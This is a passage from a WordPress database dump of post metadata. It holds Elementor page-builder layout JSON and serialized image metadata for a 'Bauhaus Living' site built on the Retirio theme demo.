":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\" Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living\",\"title\":\"Wujudkan mimpi anda sekarang!\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4302,4932,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4303,4932,'_elementor_pro_version','3.8.1'),(4305,4933,'_wp_attached_file','2022/06/bahaus_logo.png'),(4306,4933,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:400;s:6:\"height\";i:164;s:4:\"file\";s:23:\"2022/06/bahaus_logo.png\";s:8:\"filesize\";i:52163;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"bahaus_logo-300x123.png\";s:5:\"width\";i:300;s:6:\"height\";i:123;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14264;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"bahaus_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9563;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:23:\"bahaus_logo-390x164.png\";s:5:\"width\";i:390;s:6:\"height\";i:164;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18709;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:23:\"bahaus_logo-378x164.png\";s:5:\"width\";i:378;s:6:\"height\";i:164;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18686;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4307,4934,'_wp_page_template','default'),(4308,4934,'_elementor_edit_mode','builder'),(4309,4934,'_elementor_template_type','wp-post'),(4310,4934,'_elementor_version','3.6.6'),(4311,4934,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4312,4934,'_elementor_page_assets','a:0:{}'),(4313,4934,'_elementor_css','a:6:{s:4:\"time\";i:1668397354;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4314,4935,'_wp_page_template','default'),(4315,4935,'_elementor_edit_mode','builder'),(4316,4935,'_elementor_template_type','wp-post'),(4317,4935,'_elementor_version','3.6.6'),(4318,4935,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4319,4935,'_elementor_page_assets','a:0:{}'),(4320,4935,'_elementor_css','a:6:{s:4:\"time\";i:1668397354;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4321,169,'_elementor_pro_version','3.8.1'),(4323,169,'_edit_last','3'),(4324,4937,'_elementor_edit_mode','builder'),(4325,4937,'_wp_page_template','default'),(4326,4937,'_elementor_template_type','wp-post'),(4327,4937,'_elementor_version','3.8.1'),(4328,4937,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center 